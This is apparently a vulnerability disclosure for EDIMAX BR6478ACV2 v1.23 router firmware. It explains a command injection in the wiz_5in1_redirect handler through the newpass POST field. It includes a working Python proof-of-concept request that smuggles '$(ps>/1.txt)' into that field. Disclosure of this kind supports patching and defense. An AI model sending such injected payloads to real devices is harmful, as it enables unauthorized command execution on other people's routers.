BR6478ACV2_v1.23
The EDIMAX BR6478ACV2_v1.23 firmware has a command injection vulnerability in the wiz_5in1_redirect function. The Var variables receive the newpass parameters from a POST request. However, since the user can control the input of these variables, the statement system() can cause a command injection.
import requests
ip = "192.168.2.1"
payload = "$(ps>/1.txt)"
data = {"updateLogInPw_page": '1', "newpass": payload}
url = f'http://{ip}/goform/wiz_5in1_redirect'
res = requests.post(url=url, data=data, verify=False)
print(res)
